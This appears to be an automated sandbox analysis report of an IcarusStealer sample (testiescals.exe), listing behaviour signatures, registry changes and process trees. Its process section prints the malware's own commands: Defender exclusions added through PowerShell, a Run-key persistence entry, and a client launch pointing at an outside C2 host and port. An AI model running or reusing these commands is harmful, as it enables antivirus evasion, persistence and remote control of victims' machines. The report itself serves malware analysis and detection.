Analysis Overview
SHA256
b35787b524c38dc8470f490e07785e3d79529f30ea703e3eb998b95b53747f0b
Threat Level: Known bad
The file testiescals.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 03:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 03:35
Reported
2024-03-09 03:38
Platform
win7-20240221-en
Max time kernel
146s
Max time network
120s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\Users\\Admin\\AppData\\Roaming\\system.exe\"" | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
Network
Files
memory/2920-1-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-0-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-2-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-3-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-5-0x00000000745B0000-0x0000000074B5B000-memory.dmp
memory/2920-6-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-7-0x00000000023D0000-0x0000000002410000-memory.dmp
memory/2920-8-0x00000000023D0000-0x0000000002410000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 03:35
Reported
2024-03-09 03:38
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "\"C:\\Users\\Admin\\AppData\\Roaming\\system.exe\"" | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3248 set thread context of 3092 | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | C:\Users\Admin\AppData\Local\Temp\testiescals.exe |
| PID 464 set thread context of 2120 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{AB178A99-891E-4794-8996-11841276B146} | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\testiescals.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\as2cyhgw\as2cyhgw.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5ED9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF986C6C26C944EEA912369597B75CD5.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Users\Admin\AppData\Local\Temp\testiescals.exe
"C:\Users\Admin\AppData\Local\Temp\testiescals.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ravpggri\ravpggri.cmdline"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES77A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3FBA7B35E5B8406D8F98ECD3FFECA56.TMP"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
C:\Windows\SysWOW64\cmd.exe
